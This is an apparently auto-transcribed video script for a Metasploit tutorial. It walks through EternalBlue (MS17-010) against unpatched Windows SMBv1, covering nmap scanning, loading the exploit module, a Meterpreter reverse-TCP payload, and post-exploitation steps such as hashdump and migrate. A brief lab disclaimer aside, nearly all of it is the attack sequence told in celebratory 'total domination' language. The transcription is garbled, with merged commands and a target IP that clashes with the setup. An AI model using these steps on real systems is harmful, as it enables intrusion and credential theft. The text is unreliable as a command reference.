one vulnerability, one world shutdown. This is the exploit that broke the internet, the weapon the NSA never wanted you to touch. Skip this video, then Windows survives. Watch it, you become the reason it crashes. This is Metasploit Masterclass. Like, sub, bell, or stay powerless. Let's activate EternalBlue. What is EternalBlue? The most legendary Windows exploit ever leaked, used by WannaCry. Targets SMB v1 vulnerability MS17010 on Windows 7, Windows Server 2008, unpatched SMB servers, gives full system access, no credentials, no user interaction, total domination, ethical only, use in lay-B VMs. I am not responsible for misuse. Lab setup, simple and clear. Attacker, Linux machine. Target, Windows 2008, unpatched, firewall off, SMB v1 on. Network, VirtualBox only. Example IPs, Linux 192.168.116.100, Windows 192.168.116.225. Take a snapshot. EternalBlue can crash the victim. Step 1. Confirming MS17-010. Vulnerability 1. Host discovery, Nmap-SN 192.168.116.0/24. Purpose: find all active devices. Goal: make sure Windows target is alive. Tip: use PN if ping blocked. 2. Check SMB version Nmap P445 SV script SMB protocols 192.168.116.225. If you see SMB v1 enabled, that's good. EternalBlue loves SMB v1.3. Confirm the vulnerability Nmap-P445-script SMB vuln EMS 17-01019.168.116.225. If output shows vulnerable remote code execution MS17-010. Congratulations, you are now holding the detonator. Step 2. Exploiting EternalBlue with Metasploit 1. Launch Metasploit by typing MSF console 2. Search exploit search EternalBlue. Load the main weapon. Use exploit/Windows/MS17_01_EternalBlue3. Check info. Configure target set R HOST S192.168.1.100 set R PORT 445. Optional stability trick: set groom packets 12.5. Set payload Windows/x64/Meterpreter/reverse_TCP6. Double check vulnerability check if +. Target is vulnerable fire. 7. Launch attack exploit. Watch the magic. SMB buffer overflow. Kernel execution. Session opens. System access granted. If successful, Meterpreter session opened. Welcome to the machine. Step 3. Post-exploitation. Use sysinfo to view the system information. Meterpreter, computer OS check privileges. Get you would expect NT authority system. You now control Windows like a ghost. Use #dump screenshot migrate N Explorer XE. You own the system. Windows bows to you now. Part 8 coming next. Passwords shatter. Hashes fall. We enter the realm of cracking. Click Part 8. Access is inevitable.